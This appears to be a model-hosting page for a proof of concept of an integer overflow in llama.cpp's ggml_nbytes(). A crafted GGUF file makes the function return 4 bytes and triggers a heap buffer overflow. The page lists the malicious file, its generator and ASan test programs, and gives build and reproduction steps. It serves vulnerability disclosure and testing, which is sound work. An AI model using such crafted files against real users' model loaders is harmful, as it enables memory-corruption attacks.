GGUF ggml_nbytes Integer Overflow PoC
Vulnerability: Integer overflow in ggml_nbytes() for quantized GGUF tensor types (Q4_0, Q8_0, etc.)
Impact: Heap buffer overflow when loading a crafted GGUF model file
Affected: llama.cpp / ggml (all versions with CVE-2026-33298 fix)
CWE: CWE-190 (Integer Overflow) leading to CWE-122 (Heap Buffer Overflow)
Files
overflow.gguf- Malicious GGUF file (192 bytes) that triggers the overflowcraft_gguf_overflow.py- Python script to generate the malicious GGUF filetest_overflow.c- C program demonstrating ggml_nbytes returns 4 bytes instead of ~576 PBtest_heap_overflow.c- C program with ASan demonstrating actual heap buffer overflow
Reproduction
# Build llama.cpp from source
git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp
mkdir build && cd build && cmake .. && make ggml
# Compile and run the test
g++ -O0 -g -fsanitize=address -I../ggml/include -o test test_heap_overflow.c \
-L./ggml/src -lggml -lggml-base -lggml-cpu -lm -lpthread -ldl
./test overflow.gguf
ASan will report: heap-buffer-overflow: READ ... 176 bytes after 4-byte region
- Downloads last month
- -
Hardware compatibility
Log In to add your hardware
We're not able to determine the quantization variants.
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐ Ask for provider support